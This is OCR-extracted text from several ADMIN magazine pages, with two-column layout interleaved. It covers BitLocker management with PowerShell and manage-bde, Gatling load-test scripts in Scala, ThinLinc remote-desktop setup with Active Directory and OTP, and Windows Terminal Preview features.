tionMethod AES256 parameter for the Now, users who want to change systems for scripting BitLocker calls.
encryption method, you can choose to this drive need to enter the The tool offers a useful choice of op-
between AES256 and AES128 in your password in Explorer or use the tions for rolling out and managing
script. The -UseSpaceOnly parameter Unlock-Bitlocker cmdlet with the drive encryption. To use it, you will
additionally specifies that you only password. Again, the assumption need administrator rights (i.e., a com-
want to encrypt the space on the is that you stored it in the $PassW mand prompt or a PowerShell win-
volume that is occupied by data. We variable: dow with elevated rights). The fol-
simply passed the password to the lowing call then shows the BitLocker
$PassW variable with the Read-Host Unlock-Bitlocker -MountPoint "E" U status on the local system:
cmdlet to demonstrate the use of -Password $Pass
Enable-Bitlocker: manage-bde status
The Enable-Bitlocker cmdlet in par-
$PassWd = Read-Host U ticular offers a large number of other The output is quite detailed and not
-Prompt "Password, please?" U parameters and options. Microsoft only shows you the conversion status
-AsSecureString provides detailed documentation online (Is the entire hard drive encrypted or
Enable-Bitlocker U [2], including a description of how to only the occupied space?) but also
-MountPoint "E:" U use a trusted platform module (TPM), the encryption method and the type
-EncryptionMethod AES256 U among other things. With the help of of key protection device used. You
-UsedSpaceOnly U the command can then immediately see whether the

Figure 3: Encrypting the device.

32 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 BitLocker and PowerShell TO O L S

system is equipped with a TPM and (version 1809) versions. The mes- key to decrypt parts of a BitLocker-
whether it is used on the volume with sage said manage-bde could not man- protected drive, even if the disk is
the operating system. Calling age the trusted platform module “in damaged. However, the command
this version of Windows” and was cannot repair a drive if anything
manage-bde on <drive> followed by the recommendation failed during the encryption or de-
manage-bde off <drive> to edit the Microsoft Management cryption process.
Console Manage TPM snap-in or the
then lets you switch on or off encryp- corresponding PowerShell cmdlets. Conclusions
tion for the respective drive. For exam- We were then able to display the
ple, if you want to unlock a drive that is TPM settings on the various devices Encrypting drives significantly
protected by BitLocker, run the follow- without any problems by calling the reduces the vulnerability of a Win-
ing command with the appropriate key Get-TP cmdlet. dows system, especially on mobile
(always 48 digits) or with the recovery As an administrator, TrustedPlatform- devices. Because BitLocker is an
password in the following form: Module provides a whole series of integral part of the professional ver-
cmdlets with which you can not only sions of Windows 10 – and likewise
manage-bde -unlock C: U discover the trusted platform module with Windows 11, as well – it is a
-RecoveryPassword 670499-444444-307582-U but reset it or examine which features good choice for encrypting both
555555-209561-145200-316107-999999 the module supports on the specific drives built into computers and ex-
device, among other things. ternal storage media such as USB
With the help of the -RecoveryKey Finally, we would like to mention the sticks. Microsoft offers many ways
<drive> parameter, you can then also repair-bde command-line tool for the to automate the configuration and
load a key that is stored on an exter- sake of completeness. This software is monitoring of drive encryption by
nal drive: an additional offering from Microsoft scripts with a series of PowerShell
that, according to the description, tries cmdlets and additional command-
manage-bde -unlock F: -RecoveryKey T:\ to reconstruct critical parts of a se- line programs. Q
verely damaged drive and recover any
According to the documentation, recoverable data. However, this explic-
manage-bde also offers the option to itly only applies if the drive was en- Info
read and configure the TPM module. crypted by BitLocker and the user has [1] PowerShell BitLocker management:
However, calling a valid password or recovery key for [https://docs.microsoft.com/en-us/
decryption. The tool has the syntax: windows/security/information-protection/
manage-bde -tpm bitlocker/bitlocker-use-bitlocker-drive-
repair-bde <input_volume> U encryption-tools-to-manage-bitlocker]
caused an error message in our lab <output_volume_or_images> [2] Enable-BitLocker cmdlet: [https://
on both the current Windows 10 docs.microsoft.com/en-us/powershell/
(Professional and Enterprise in ver- You should be able to use the key module/BitLocker/enable-BitLocker?
sion 21H1) and Windows Server 2019 package and recovery password and view=windowsserver2019-ps]

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 33
 TO O L S Gatling

Gatling load-testing tool

Stressed
Generate load on servers and services with the Gatling load-testing tool. By Christopher Dock

When questioned at work about how was in 2012, and only a few years don’t have a custom IDE for develop-
the test tool Gatling [1] compared with later, its founder created Gatling Corp. ment. Instead, you use the Gatling
the somewhat old JMeter, I was at a to develop and maintain the software. framework in your favorite editor to
loss for words. However, it did give me Over the years, Gatling morphed into write your own test script in Scala.
the opportunity to learn more about a product with both open source and
Gatling and eventually present another Enterprise variants that can hold their Getting Started
possible tool in the arsenal against own against other test tools.
weak servers and services. Yet, Gatling has taken a significantly All Gatling tests start pretty much the
In retrospect, I’m not sure how I different path from some of the other same, by subclassing from the Scala
missed Gatling, which is no recent load-testing products such as JMeter Simulation class. The simulation is
upstart. Gatling’s first stable release and LoadRunner. With Gatling, you essentially a collection of individual

Listing 1: Simple Gatling Example

01 package com.mypackagename 22 var httpProtocol = http
02 23 .baseUrl(qualifiedhost)
03 import Scala.concurrent.duration._ 24
04 import io.gatling.core.Predef._ 25 if (proxyport > 0)
05 import io.gatling.http.Predef._ 26 httpProtocol = httpProtocol.proxy(Proxy(proxyhost,proxyport))
06 27
07 class BlazeDemoV1 extends Simulation { 28 val scn = scenario("BookFlight")
08 29 .exec(http("step_1")
09 var qualifiedhost = "http://blazedemo.com" 30 .get("/")
10 var proxyport = 0 31 .headers(headers)
11 var proxyhost = "not set" 32 .check(status.is(200)))
12 33 .exec(http("step_2")
13 // headers for HTTP call 34 .get("https://google.com/")
14 val headers = Map( 35 .headers(headers)
Photo by NoWah Bartscher on Unsplash

15 "Accept" -> "text/html", 36 .check(status.is(200)))

16 "User-Agent" -> "LinuxMagazine/1.0.1", 37 .pause(5)
17 "Accept-Encoding" -> "gzip, deflate", 38
18 "Connection" -> "keep-alive", 39 setUp(
19 "DNT" -> "1" ) 40 scn.inject(atOnceUsers(1))
20 41 ).protocols(httpProtocol)
21 // http connector 42 }

34 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Gatling TO O L S

requests that a user or program would process is reminiscent of Java. One of Listing 2: Parallel Load Tests
normally make. Because your test is a the neat technology choices that was 01 setUp(
program, you are given the flexibility made is that the Scala code is com- 02 scn1.inject(
of creating variables, constants, and piled by the Java compiler and then 03 constantConcurrentUsers(2).during(60.seconds),
methods, and because you are using uses the Java Virtual Machine (JVM) 04 rampConcurrentUsers(2).to(4).during(10.seconds)
a proper programming language, you installed on your computer. 05 ).protocols(httpProtocol),
can create your own library of sup- This one feature alone allows you to 06 scn2.inject(
port objects or methods. use any of the existing standard Java 07 constantUsersPerSec(2).during(15.seconds),
Your performance tests can include libraries or even your own custom 08 rampUsersPerSec(2).to(4).during(10.seconds)
09 ).protocols(httpProtocol)
one or more classes, but you can cre- code. Yet Java code is subtly differ-
10 )
ate and include a lot of regular Scala ent in syntax, so even using standard
objects, as well. Scala also supports Java.io calls to read files will look
an object type that appears to be fairly foreign once completed. The framework does have the http
similar to a class, but it is more akin Line 7 defines the class file, which inher- object, which encapsulates all of the
to a singleton than a normal Java or its from the Scala base class Simulation, logic for connections between ma-
C++ class. and lines 9-11 define a few variables. In chines over the Internet. Instantiating
You don’t have to be a Scala program- a proper production-quality script, these a variable with quite a number of dif-
mer to enjoy the freedom that Gatling variables would probably be replaced ferent parameters is possible with this
provides. Most developers, despite with values that are passed in or per- class. The most important parameter
having a favorite language or toolset, haps read from a configuration file. The is the URL of the machine to which
can easily learn enough Scala to cre- proxy configuration is not being used to connect. Just like with other lan-
ate their own test scripts in a few in this example, so simply setting these guages, additional method calls can
hours. Because the test script is pure variables for your proxy will allow you perform additional variable setup.
source code, you receive extra advan- to run the script over the proxy without Lines 21-26 demonstrate how to cre-
tages that are commonly enjoyed with any further modifications. ate the HTTP protocol variable and
normal software development: the Lines 13-19 define the key pairs to be how to override it in favor of a proxy
use of common developer tools such used as header values for HTTP state- server, if one is needed.
as git, diff, and grep. ments. This collection has been de- Lines 28-37 show the creation of a
The first five lines of Listing 1 assign fined as a constant with the keyword scenario that is just a list of all the
the class to a package and include all val, whereas the variables in the pre- different statements that will be
of the necessary reference informa- vious lines are re-assignable because called. The scenario test will be run
tion for the program. Of course, this they use the keyword var. again and again. In this example, one

Figure 1: Gatling proxy server recorder setup.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 35
 TO O L S Gatling

Listing 3: Proxy Recorder Excerpt scripts or who want to lighten their

load, by providing a proxy server
01 val scn = scenario("acmewebsite") that will record the steps that pass
02 .exec(http("request_0")
through it (Figure 1).
03 .get("/")
To capture a URL and what you do
04 .headers(headers_0)
05 .resources(http("request_1")
while at that URL, simply start up
06 .get(uri2 + "/resources/sites/phoenix/style/font/teleneo-variable.woff2") and point your web browser to the
07 .headers(headers_1), proxy server. The information is then
08 http("request_2") processed into a Scala source file and
09 .get(uri2 + "/binaries/assets/fonts/TeleGroteskScreen-Regular.woff") saved with a class name you provide.
10 .headers(headers_2), This output is saved into the default
11 http("request_3") location for Scala simulations.
12 .get(uri2 + "/binaries/assets/fonts/phx-core-icons.woff") To use this recorder, just press the
13 .headers(headers_2), Start button, which opens another
window (Figure 2) that lets you fol-
of the calls uses the default URL that test to verify that everything is run- low along as you select pages in your
has been set up in the HTTP protocol. ning correctly. web browser.
The second call uses a different URL Gatling provides quite a number of A side effect for scripts that have
that has no connection to the URL ways to create different load sce- been created by the recorder can be
that was used during object creation. narios. Listing 2 shows a more com- seen in Listing 3. That is, the code
Both of these statements use pre- plex setup that includes two different is pretty difficult to read because
defined header values but could just scenarios running in parallel. Each of most modern web pages have a lot
as easily be different sets for different these scenarios use different methods of resources, Java scripts, or other
calls. Each of these statements check for generating user load. frameworks. Everything that is
that the call receives return code 200, downloaded by the website will also
indicating a successful call. Point-and-Click Testing be downloaded in tests created with
The final and most important part the proxy recorder. These resources
of this script is lines 39-41. All lines Not everyone is a natural-born soft- are necessary for a web page but
up to this point define and prepare a ware developer. However, quite a few might not be required for perfor-
test scenario, but in these three final people who might not be able to cre- mance testing.
lines, the user scenario is executed ate a program from scratch can make The proxy recorder is a convenient
by the framework. In this particular small modifications to or extend exist- way to create a sample script that
code, the test is only run once with ing programs. can be used as a source when writing
a single user. Although not a very re- Gatling provides a crutch for people your own test scripts. This recorder
alistic load test, it is a perfect smoke who either cannot write their own can be run for all of the steps in your
test. Then, you have all the headers
as well as the URLs you will need in
code form. However, all but the most
simple tests should probably be refac-
tored into a few Scala objects and
classes to make the code understand-
able and the test script maintainable.

Extending Scala and Java

Perhaps the major advantage of
Gatling tests is that they are written
as small programs that can be orga-
nized into smaller, easy-to-understand
units, which also makes the code
calling it much easier to understand.
The most reasonable decomposition
would be to extract the testing steps
from Listing 1 and put them into their
own object, similar to Listing 4.
The new DemoSteps object contains
Figure 2: Proxy recorder window. the headers and two steps, each

36 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Gatling TO O L S

Table 1: Gatling Command-Line Args Listing 4: Test Code in Separate Object

Command Function 01 package com.mypackagename
-sf <simulation dir> Path for Gatling class and object sources 02
03 import io.gatling.core.Predef._
-rf <results dir> Location of test reports
04 import io.gatling.http.Predef._
-bf <temp dir> Temp directory of compiled objects 05
-rsf <resource dir> Location of input files 06 object DemoSteps {
07
-s <classname> Name of Scala class to run
08 // headers for HTTP call
-rd <description> Descriptive text added to a report 09 var headers = Map(
10 "Accept" -> "text/html",
having a meaningful name. This code that runs a test and uses those local 11 "User-Agent" -> "LinuxMagazine/1.0.1",
12 "Accept-Encoding" -> "gzip, deflate",
is easy to understand and maintain directories.
13 "Connection" -> "keep-alive",
and makes the scenario definition All of the output goes to stdout. A
14 "DNT" -> "1")
four very readable lines: small status block (Listing 6) lets you
15
keep an eye on the status of the script 16 var getSitePage =
val scn = scenario("BookFlight") that is running Gatling, with the 17 exec(http("step_1_getpage")
.exec( successes and failures for each step 18 .get("/")
DemoSteps.getSitePage, output every five seconds. Normally 19 .headers(headers)
DemoSteps.getGooglePage); you would not watch this output, but 20 .check(status.is(200)))
it is a convenient way to verify that 21
If this test had many steps and a everything is working as the script 22 var getGooglePage =
more meaningful object name, it gets started. Once Gatling is finished 23 exec(http("step_1_getgoogle")
24 .get("https://google.com")
would be possible for anyone to have running, it will output a final block
25 .headers(headers)
a complete understanding of what the with some statistics, as well as the
26 .check(status.is(200)))
test does and how it is organized. directory where the output report has
27 }
You can create simple methods within been generated.
a Scala object that use plain old Java
code and library calls: Listing 5: Running a Local Test
Gatling Output
#!/bin/bash
def getnow() : String = { Reports are generated as HTML CLASS=$1
var calendar = Calendar.getInstance() (Figures 3 and 4), and all reports SRC=`pwd`/simulations
var now = calendar.getTime() + ""; can be made available over your RESOURCE=`pwd`/resources
now intranet, where users can view them RESULT=`pwd`/results
} with their web browser. Because the TMP=`pwd`/temp
DESC="desc goes here"
reports are powered with a bit of
In this way, you can leverage all of JavaScript, you can zoom in and in-
gatling.sh -sf $SRC -rsf $RESOURCE -rf $RESULT -bf $TMP
your expertise and custom libraries in spect the steps and define the start-
-s $CLASS -rd DESC
your tests. ing and ending times.

Listing 6: Test Status

Running Tests
================================================================================
Gatling is a command-line program, 2021-06-20 22:49:24 17s elapsed
which makes it easy to script tests. ---- Requests ------------------------------------------------------------------
The gatlingdemo.sh script [2] can be > Global (OK=24 KO=0 )
run directly without parameters, in > step_1_getpage (OK=3 KO=0 )
which case it will use all of the de- > step_1_getpage Redirect 1 (OK=3 KO=0 )
fault directories and provide a list of > step_2_reserve (OK=3 KO=0 )
all available Gatling tests in the simu- > step_2_reserve Redirect 1 (OK=3 KO=0 )
lations directory. > step_3_purchase (OK=3 KO=0 )
> step_3_purchase Redirect 1 (OK=3 KO=0 )
A convenient way of organizing tests
> step_4_confirm (OK=3 KO=0 )
is to have the source code and test
> step_4_confirm Redirect 1 (OK=3 KO=0 )
results in separate directories, which
can be accomplished by having all of
---- BookFlight ----------------------------------------------------------------
the Gatling directories in a separate
active: 0 / done: 3
directory by test (Table 1). The ex-
===============================================================================
ample in Listing 5 is a simple script

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 37
TO O L S Gatling

The calls for this test have been

stored in their own Scala FlightSteps
object for better clarity. The Scala
code for this object is quite similar
to those seen in Listings 1 and 3. All
of the code for this test is available
online [2], but perhaps the most in-
teresting part of the test is the main
script (Listing 7).
Most of the first 26 lines of the test
script are similar to the first Gatling
example. It includes all the required
Gatling include files (i.e. import
io.gatling.core.Predef._), as well as
two custom objects. Lines 13-14 re-
trieve values from Bash environment
variables. When these variables are
defined, the values will be used to
set up the proxy. Lines 28-35 define
the test scenario that performs the
four steps of purchasing a ticket. The
most important lines are 37-42. In
this example, no real load is gener-
Figure 3: Results in tabular form. ated against the server, but it would
be just as easy to change the code to
Full Test you can also use this same website to run the scenario 50 or 100 times in
test your skills. Booking a ticket on parallel.
A BlazeMeter [3] sample website sim- the site takes four simple steps: Although Gatling is a nice tool, you
ulates a travel site that can be used Q Choose departure and destination should compare it against alternative
for testing JMeter. HTTP calls made cities performance testing tools, such as the
to this site step through the simulated Q Pick an airline proprietary LoadRunner or the open
process of booking a ticket. Because Q Enter payment details source JMeter [4]. This exact same test
Gatling can also make HTTP calls, Q View the confirmation with the BlazeMeter test site is also
available in a previous article [5] for a
direct comparison with JMeter. Q

Info
[1] Gatling: [https://gatling.io/]
[2] Code for this article: [ftp://ftp.
linux-magazine.com/pub/listings/
admin-magazine.com/67/]
[3] BlazeMeter test site:
[https://blazedemo.com]
[4] Apache JMeter:
[https://jmeter.apache.org/]
[5] "JMeter Performance Testing" by Christo-
pher Dock, ADMIN, issue 66, 2021, pg. 72

Author
Christopher Dock is a senior consultant at
T-Systems onsite services. When he is not
working on integration projects, he likes to
experiment with small embedded solutions such
as the Raspberry Pi or Arduino. To this end, he
has authored a book to help people get started in
the area of DIY electronics, Getting Started with
Figure 4: Graphs of response times. Arduino and Raspberry Pi, ISBN 978-1952930027.

38 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Gatling TO O L S

Listing 7: Gatling Script for BlazeMeter

01 package com.mypackagename 24 println(s"proxyhost $proxyhost");
02 25 println(s"proxyport $proxyport");
03 import Scala.concurrent.duration._
26 }
04 import io.gatling.core.Predef._
27
05 import io.gatling.http.Predef._
28 val scn = scenario("BookFlight")
06
07 import com.mypackagename.mySupport._ 29 .exec(
08 import com.mypackagename.FlightSteps 30 FlightSteps.getSitePage,
09 31 FlightSteps.reserveFlight,
10 class BlazeBookFlight extends Simulation { 32 FlightSteps.purchaseFlight,
11
33 FlightSteps.confirmFlight
12 var qualifiedhost = "http://blazedemo.com"
34 )
13 var proxyhost = fetchEnvString("proxyhost","not set")
14 var proxyport = fetchEnvInt("proxyport",0) 35 .pause(5)
15 var debug = 0 36
16 37 setUp(
17 // http connector 38 scn.inject(
18 var httpProtocol = http
39 constantConcurrentUsers(1).during(6.seconds),
19 .baseUrl(qualifiedhost)
40 rampConcurrentUsers(1).to(2).during(4.seconds)
20
21 if (proxyport > 0) 41 ).protocols(httpProtocol)

22 { 42 )
23 httpProtocol = httpProtocol.proxy(Proxy(proxyhost,proxyport)) 43 }
TO O L S ThinLinc

Remote access with ThinLinc 4.12

Timeless Classic
The revival of terminal servers during the Covid-19 crisis depended on the IT administrator to enable home
office workplaces, with the help of tools like ThinLinc, a Linux remote desktop server. By Holger Reibold
The COVID-19 pandemic is credited version 4.12 and includes both the because they only need to keep the
with being a catalyst in the area of server-based elements (session bro- server in mind, making it much easier
digitalization. Processes had to be ker, load balancer, admin interface) to monitor the environment.
digitalized within a very short time and the end-user components (client In principle, ThinLinc supports all
at a speed that previously seemed software, customization tools). The Linux distributions that use the RPM
impossible. Virtually overnight, interaction of these different compo- or DPKG package managers. The
the importance of the role of IT ad- nents produces a complete solution tool’s system architecture is based
ministrator grew enormously, with that fulfills all requirements for a on a typical client-server architecture
administrators frequently benefiting modern terminal environment. designed in such a way that the ter-
from technologies that long since In this article, I’ll show you how to minal server can be integrated effort-
seemed outdated. Terminal services, set up the software, adapt it to a Win- lessly into an existing IT infrastruc-
an almost forgotten technology that dows environment, and ensure access ture (Figure 1). Apart from regular
allows home office workplaces to be is protected. system authentication, integration of
set up with a minimum of time and NetIQ eDirectory identity infrastruc-
effort, come from an age when clients Technical Foundation ture management, Active Directory
were little more than simple character (AD), Network Information Service
displays. For administrators, they are In technical terms, ThinLinc is a (NIS), and other elements is also
a welcome tool, because they allow Linux remote desktop server that possible. ThinLinc uses pluggable
simpler administration of centrally primarily uses open source soft- authentication modules (PAM) for
operated applications and settings ware such as TigerVNC, noVNC, authentication.
than is the case with high-mainte- OpenSSH, common Unix printing sys- The software supports clustering
nance desktop computers. tem (CUPS), and PulseAudio. From and offers high availability and load
The use of classic terminal server these tools, the developer, Cendio balancing. To ensure high avail-
technologies with one (or more) cen- of Linköping, Sweden, developed a ability, two systems act as virtual
Photo by Clem Onojeghuo on Unsplash

tral servers promises optimum utiliza- robust, stable environment for server- systems management (VSM) servers.
tion of a central server system instead based computing. If a system is down, the VSM server
of the often inefficient distribution ThinLinc provides the resources of handles requests so as to ensure
to desktops. In principle, a server- the Linux server in use by convert- that no or only minor disruptions to
based solution increases availability ing a regular Linux distribution into a services occur. Load balancing dis-
and, thus, ultimately security. Now remote desktop server, which simpli- tributes the user sessions uniformly
18 years old, ThinLinc is available in fies typical tasks for administrators to the servers in a ThinLinc cluster,

40 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 ThinLinc TO O L S

with the servers burdened equally To provide every user with a KDE or function that a central server solu-
insofar as is possible. Gnome desktop, you need to ensure tion also needs to support. Accord-
The architecture is characterized by around 200MB of storage space in ing to the project website, ThinLinc
the master, agent, and client. The each case. Much more important is is used in particular in university
ThinLinc master server (vsmserver) is the availability of RPM support, SSH, and official contexts, and the option
responsible for initial authentication and a correct Network Time Protocol of printing is especially required in
and selection of the terminal server. (NTP) configuration. the latter case despite growing digi-
To do this, it tracks all sessions and ThinLinc is offered under a proprie- talization. The tool therefore relies
distributes the load to several agents tary license, but the developers pro- on the renowned CUPS print server
in a cluster. Its task is also to ensure vide a demo version for download for print functionality.
that the clients receive the relevant that is limited to five users working ThinLinc essentially offers two vari-
session information. simultaneously. The cost for five to ants: access to a local printer or to the
The tasks of the ThinLinc agent (vs- 10 users is to $78 per year per user nearest printer. In the first case, you
magent) include starting and hosting and for 11 to 49 users is $66 per have two operating modes: device-
the processes from which a session is year per user. To install, download independent and device-dependent.
generated. The agent also establishes the ZIP archive from the ThinLinc The two can be combined.
tunnels for graphical and local de- website [1], unpack it into a direc- You need to revert to the ThinLinc
vices. The tunnels are multiplexed for tory of your choice, and start the setup to install the PDF conversion
each user by means of a Secure Shell installation script with: filter, the back end, and the queue
(SSH) connection. Finally, the client in CUPS on all machines. The setup
establishes two connections: one with sh ./install-server adds a new queue called thinlocal
the master first, and then another to the CUPS server and makes it
with the agent that the master quali- If you have a valid license, save the available to the users. The thinlocal
fies as being optimal. relevant text file with the file exten- printer is cluster-enabled: If a user
sion .license in the /opt/thinlinc/ sends a print request to a node in a
Installation Preparations etc/licenses directory. In principle, ThinLinc cluster that is not hosting
the basic system is now ready for use. the user session, the print request
Before performing the installation, You can install the printer as a next is forwarded automatically to a suit-
you should check the Linux server step or set up web access. able node.
system you want to use with ThinLinc The local printer is ready to use once
to make sure it fulfills the necessary Configuring Printers the installation is complete; you only
system requirements. The hardware need to ensure in the ThinLinc client
side has no special requirements.
with CUPS configuration that the diversion has
The server configuration should be Despite the increased acceptance been activated.
guided primarily by the requirements of the paperless office, printing
that users place on the environment. documents remains an important Implementing Single App
Access
ThinLinc offers various possibili-
ties that are not all recognizable at
first glance. Instead of a complete
desktop, you can limit the user
environment to a single applica-
tion – a very interesting option from
a security perspective. In practice,
you can limit access, for example, to
a web browser. Only web-based ac-
cess with Firefox is then available to
employees.
For this purpose, changes are
needed to the ThinLinc configura-
tion file opt/thinlinc/etc/conf.d. To
do so, generate a new profile by ed-
iting the profiles.hconf file, which
could look as follows in an instance
where Firefox is the only permitted
Figure 1: New terminals can be created and printers shared in the admin web interface. application:

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 41
 TO O L S ThinLinc

[/profiles/firefox] that the AD domain can be recorded and make the changes shown in
name=Firefox only correctly. Listing 1 shows what this Listing 2.
description=Example configuration of U must look like. To join the domain and After installing Google Authenticator
single app access to ThinLinc provide the admin password for access on the terminal, the user still needs
cmdline=${TLPREFIX}/bin/U and verify the user resolution in Active to activate OTP functionality on the
tl-single-app firefox Directory, use the commands: ThinLinc server. To do this, execute
testcmd=type firefox the google-authenticator program,
realm join <domain> which opens an interactive dialog.
You must also add the new profile to id testuser@<domain> During configuration, a QR code is
the order parameter: output that the user scans with the
Additionally, the system security ser- terminal device to activate the func-
order=firefox vices daemon (SSSD) configuration tionality.
sssd.conf must be adapted to make
After saving and restarting the Thin- ThinLinc recognizable as a service. To Access in a Web Client
Linc server, the new profile is avail- do this, edit the file /etc/sssd/sssd.conf
able from the profile selection. and add the line: ThinLinc also provides a web client.
For this purpose, it uses noVNC, a
ad_gpo_map_remote_interactive = +thinlinc VNC client JavaScript library. Both
Adapting to Windows
administrators and users benefit
The option of accessing Active Direc- The changes take effect after entering from the fact that noVNC [2] can
tory and a Windows file server is be executed in mobile environments
important for integration in a hetero- systemctl restart sssd like Android and iOS. The advan-
geneous network environment. First, tage for the user is clear: The instal-
you must install various components to restart SSSD. lation of the ThinLinc client is not
on the ThinLinc clients: absolutely necessary, and nothing
Enhancing Access Security hinders access by mobile terminals.
yum install realmd sssd U Although “traditional” ThinLinc
oddjob oddjob-mkhomedir U When accessing the ThinLinc clients all use SSH for encrypting
adcli samba-common-tools U server, you have the option of using the client-server connection, the
krb5-workstation two-factor authentication, a one- web client uses TLS as a protocol.
time password (OTP), or a standard noVNC provides HTML5 functional-
The next step is to activate collabora- password for authentication. The ity. Implementation of bring-your-
tion with the Windows DNS service so procedure for enabling OTP au- own-device policies is therefore also
thentication for accessing ThinLinc possible.
Listing 1: Windows Integration starts with installing the Google Au-
[localhost]# realm discover <Domain> thenticator: Summary
DOMAIN
type: kerberos sudo dnf install google-authenticator Terminal environments are experi-
realm-name: <Domain> encing a revival as a result of the
domain-name: <Domain> Next, configure SSHD so that the COVID-19 crisis. Administrators can
configured: no daemon permits authentication by draw on a considerable range of com-
server-software: active-directory editing the file /etc/ssh/sshd_config mercial and free tools for solutions.
client-software: sssd
and activating the ChallengeResponse- However, companies must decide
required-package: oddjob
Authentication option: whether a commercial tool, such as
required-package: oddjob-mkhomedir
ThinLinc, is worthwhile or whether it
required-package: sssd
# Change to no to disable s/key passwords would be better to use a free remote
required-package: adcli
required-package: samba-common-tools desktop tool like UltraVNC. Compared
ChallengeResponseAuthentication yes directly, they are not significantly
different. A ThinLinc license makes
Listing 2: /etc/pam.d/thinlinc This system modification sense primarily where companies are
#%PAM-1.0 e also takes effect after a dependent on timely support. Q
Auth required pam_sepermit.so e restart. The next step
Auth substack password-auth e involves configuring the
Auth required pam_google_authenticator.so nullok e interaction between PAM Info
Auth include postlogin e
and Google Authentica- [1] ThinLinc: [https://www.cendio.com/
account required pam_sepermit.so e
tor. To do this, edit the thinlinc/what-is-thinlinc]
account required pam_nologin.so e
file /etc/pam.d/thinlinc [2] noVNC: [https://novnc.com/info.html]

42 A D M I N 67 W W W. A D M I N - M AGA Z I N E .CO M
 Windows Terminal Preview TO O L S

New features in Windows Terminal Preview

Quick Shell
Windows Terminal Preview comes with interesting new features, such as interface (Figure 1). Depending on
the Preview version you use, some
state-preserving quick windows access via shortcuts and configuration very detailed settings might still need
of almost all settings in a GUI, which is reason enough to take a look at to be edited directly in the JSON file.
the preview. By Rainer W. Gerling Whether this will change by the time
the final 2.0 version is released re-
mains to be seen. Note that the key
You can pick up both the current Configuration (Almost) names are localized if you change the
version of Windows Terminal interface language, but the JSON file
and Windows Terminal Preview
Without an Editor always uses the English expressions.
from the Microsoft Store [1]. Al- One important innovation is the The profiles for the command
ternatively, a manual install from graphical interface for configuring the prompt, PowerShell, Windows Sub-
GitHub [2] is also possible; make tool. It was already included in the system for Linux, and Azure Cloud
sure you choose the version with current version, although with sig- Shell are always generated automati-
the highest release number. At the nificantly reduced functionality. Most cally if the respective feature is avail-
end of the description, you will find settings can be made in the graphical able. Deleting these profiles will not
the Assets item, which you should
expand if you do not see any file
links there. A click on the line with
the file name ending with msix-
bundle starts the download of the
installation package – or the instal-
lation, depending on your browser
settings. If you install from the
Microsoft Store, the applications are
updated automatically.
Photo by Mohamed Shaffaf on Unsplash

For this article, I looked at the Win-

dows Terminal Preview, which at
the time was version 1.10.1933.0
with the then current Stable version
at 1.9.1942.0. Both the Preview and
Stable versions can be used in paral-
lel with separate settings. Figure 1: The graphical user interface for configuring the Windows Terminal Preview.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 67 43
 TO O L S Windows Terminal Preview

Listing 1: globalSummon Examples supports Quake mode. In the Preview onCurrent moves the terminal win-
version, an icon is visible in the task- dow to the foreground if it is on the
01 { bar, but not in the Stable version. current desktop. Otherwise, a new
02 "command":
window opens with the default pro-
03 {
Key Bindings Become Actions file on the current desktop.
04 "action": "globalSummon",
The monitor parameter has the any,
05 "desktop": "onCurrent",
06 "monitor": "any" In the Actions sidebar item, dubbed toCurrent, and toMouse options, where
07 }, Key bindings in earlier versions, you any keeps the terminal window on
08 "keys": "ctrl+1" can configure the shortcuts between the display on which it is currently
09 }, the key combinations and the Win- open, but moves it to the foreground;
10 { dows terminal commands. They toCurrent drags the terminal window
11 "command": can be adjusted conveniently in the to the screen where the focused Win-
12 { graphical configuration interface, dows window is, regardless on which
13 "action": "globalSummon", which also gives you access to the monitor it is currently displayed; and
14 "desktop": "onCurrent",
JSON file (bottom menu item) that toMouse moves the terminal window
15 "monitor": "toMouse",
stores all settings. Therefore, you can to the monitor that holds the mouse
16 "name": "Debian"
easily transfer the customized ac- pointer.
17 },
18 "keys": "ctrl+2"
tions to another computer. If you do not specify the name param-
19 } To define actions, select Settings | eter, the action refers to the last termi-
Actions. A click on the pencil icon nal window you used. Otherwise, the
(which appears when you hover parameter moves the terminal win-
do you any good because they will over the line in question) lets you dow with the specified name to the
just be created again. However, you change the keyboard shortcut. Af- screen. Listing 1 shows two examples.
can disable them by enabling the ter making changes, don’t forget to The parameters can only be entered
Hide profile from dropdown option. press the Save button. Note that the directly in the JSON file.
The settings in Defaults apply to all selection accessible from the com-
profiles. Exceptions are configured in mand palette in the standard menu Clickable Links and Default
the individual Profiles panes. is used for executing the commands
The interface is most likely not and not for configuring the settings.
Shell
final and could still change by ver- You can also reach the command In the interface under Interaction,
sion 2.0, but one thing that should palette with the Ctrl+Shift+P you can use the Automatically detect
remain is that right-clicking on a shortcut and then select an action URLs and make them clickable action
window tab opens a menu for cus- from the menu or type the com- to determine whether or not identi-
tomizing the tab. mand in a kind of internal com- fied URLs will be clickable. If so, the
mand line. URL can then be opened directly by
Quake Mode control-clicking.
Great Window Management Up to now, the default shell in
One very practical function is the Windows is the command prompt.
new Quake window. A keyboard Quake mode is a special case of the However, you can also set Windows
shortcut can be used to start the globalSummon action that also has an Terminal Preview as the default shell.
Windows terminal with the de- effect outside the terminal because Microsoft still refers to this feature
fault profile in the upper half of it can be used to move the last as alpha, and it requires a Windows
the screen and immediately move terminal window you used to the 10 Developer version (22000.65 or
it to the foreground. Pressing the foreground. Parameters like desktop, higher) because the default shell is
same shortcut causes it to disappear monitor, and name let you control defined in the operating system itself
again. Between calls, the state re- exactly what happens when you use and not in Windows Terminal.
mains. The default shortcut for this multiple monitors, multiple virtual If you are using a suitable Developer
is Win+`, which can cause colli- desktops, or both. version, start the command prompt
sions with the default key combina- The desktop parameter supports the or Windows PowerShell and call
